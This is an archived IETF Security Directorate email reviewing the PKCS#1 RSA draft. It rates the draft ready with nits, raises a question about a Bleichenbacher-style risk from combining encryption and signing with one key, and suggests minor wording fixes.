[secdir] SecDir review of draft-moriarty-pkcs1-01

Paul Wouters <paul@nohats.ca> Fri, 02 September 2016 13:02 UTC

Return-Path: <paul@nohats.ca>
X-Original-To: secdir@ietfa.amsl.com
Delivered-To: secdir@ietfa.amsl.com
Received: from localhost (localhost []) by ietfa.amsl.com (Postfix) with ESMTP id 842A312D81B; Fri, 2 Sep 2016 06:02:15 -0700 (PDT)
X-Virus-Scanned: amavisd-new at amsl.com
X-Spam-Flag: NO
X-Spam-Score: -2.548
X-Spam-Status: No, score=-2.548 tagged_above=-999 required=5 tests=[BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, DKIM_VALID_AU=-0.1, RP_MATCHES_RCVD=-0.548] autolearn=ham autolearn_force=no
Authentication-Results: ietfa.amsl.com (amavisd-new); dkim=pass (1024-bit key) header.d=nohats.ca
Received: from mail.ietf.org ([]) by localhost (ietfa.amsl.com []) (amavisd-new, port 10024) with ESMTP id 0jmX9TISNY7V; Fri, 2 Sep 2016 06:02:14 -0700 (PDT)
Received: from mx.nohats.ca (mx.nohats.ca []) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by ietfa.amsl.com (Postfix) with ESMTPS id 8E6ED12D805; Fri, 2 Sep 2016 06:02:11 -0700 (PDT)
Received: from localhost (localhost [IPv6:::1]) by mx.nohats.ca (Postfix) with ESMTP id 3sQfR35fZ8zJt7; Fri, 2 Sep 2016 15:02:07 +0200 (CEST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=nohats.ca; s=default; t=1472821327; bh=F4Ep3+B7O7t6dn7t5N1LrZuXflgBTdAeZ34ymMmTbMM=; h=Date:From:To:cc:Subject; b=HpDBObUFaBudt8H38d6Z7w664Sa6CeZtu3FG9KRr5JpJFk3H9OdVa3cTq6Yf7AnxQ IB1wj/D4L96VZL+bqh6rBKmz4RD/qmOjLwjbBgREmMbzDHdV0JVVfkuTHaAgnITDjg DkMmPo/LM8JrHGs77lY6+HFJEe1ZwQ/Q4atTKcuU=
X-Virus-Scanned: amavisd-new at mx.nohats.ca
Received: from mx.nohats.ca ([IPv6:::1]) by localhost (mx.nohats.ca [IPv6:::1]) (amavisd-new, port 10024) with ESMTP id TvuYeODjlvsk; Fri, 2 Sep 2016 15:02:06 +0200 (CEST)
Received: from bofh.nohats.ca (206-248-139-105.dsl.teksavvy.com []) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by mx.nohats.ca (Postfix) with ESMTPS; Fri, 2 Sep 2016 15:02:06 +0200 (CEST)
Received: by bofh.nohats.ca (Postfix, from userid 1000) id 740DD2ED945; Fri, 2 Sep 2016 09:02:05 -0400 (EDT)
DKIM-Filter: OpenDKIM Filter v2.10.3 bofh.nohats.ca 740DD2ED945
Received: from localhost (localhost []) by bofh.nohats.ca (Postfix) with ESMTP id 5E31A410929E; Fri, 2 Sep 2016 09:02:05 -0400 (EDT)
Date: Fri, 02 Sep 2016 09:02:05 -0400
From: Paul Wouters <paul@nohats.ca>
To: iesg@ietf.org, secdir <secdir@ietf.org>
Message-ID: <alpine.LRH.2.20.1609020853040.16363@bofh.nohats.ca>
User-Agent: Alpine 2.20 (LRH 67 2015-01-07)
MIME-Version: 1.0
Content-Type: text/plain; format="flowed"; charset="US-ASCII"
Archived-At: <https://mailarchive.ietf.org/arch/msg/secdir/5GXxAQXY3OEo63OUvh6gZWMAKsE>
Cc: draft-moriarty-pkcs1.all@ietf.org
Subject: [secdir] SecDir review of draft-moriarty-pkcs1-01
X-BeenThere: secdir@ietf.org
X-Mailman-Version: 2.1.17
Precedence: list
List-Id: Security Area Directorate <secdir.ietf.org>
List-Unsubscribe: <https://www.ietf.org/mailman/options/secdir>, <mailto:secdir-request@ietf.org?subject=unsubscribe>
List-Archive: <https://mailarchive.ietf.org/arch/browse/secdir/>
List-Post: <mailto:secdir@ietf.org>
List-Help: <mailto:secdir-request@ietf.org?subject=help>
List-Subscribe: <https://www.ietf.org/mailman/listinfo/secdir>, <mailto:secdir-request@ietf.org?subject=subscribe>
X-List-Received-Date: Fri, 02 Sep 2016 13:02:15 -0000

I have reviewed this document as part of the security directorate's 
ongoing effort to review all IETF documents being processed by the 
IESG.  These comments were written primarily for the benefit of the 
security area directors.  Document editors and WG chairs should treat 
these comments just like any other last call comments.

[Note this document describes various RSA modes. I am not a cryptographer]

This document is Ready with nits

This document describes various RSA methods. It explains and describes
various attacks and why certain decisions are made for security reasons
throughout the document. Therefore, the Security Considerations section
simply states:

 	   Security considerations are discussed throughout this memo.

Which I think is correct. (Although I would use the word "document"
instead of "memo" which I think is more common witin IETF)

The only real question I have is regarding this paragraph:

    While RSAES-PKCS1-v1_5
    (Section 7.2) and RSASSA-PKCS1-v1_5 (Section 8.2) have traditionally
    been employed together without any known bad interactions (indeed,
    this is the model introduced by PKCS #1 v1.5), such a combined use of
    an RSA key pair is NOT RECOMMENDED for new applications.

I thought that issuing malicious encryption commands to a RSASSA-PKCS1-v1_5
based (software) device could lead to compromise of the private key, and
that this was the Bleichenbacher attack? and that forbidding encryption
for a signing-only service would have a security advantage?


 	u distinct odd primes

Do you mean an odd number of primes? As primes are always odd, unless
you mean odd in the English sense :)

 	Four types of primitive are

Add "s" to primitive ?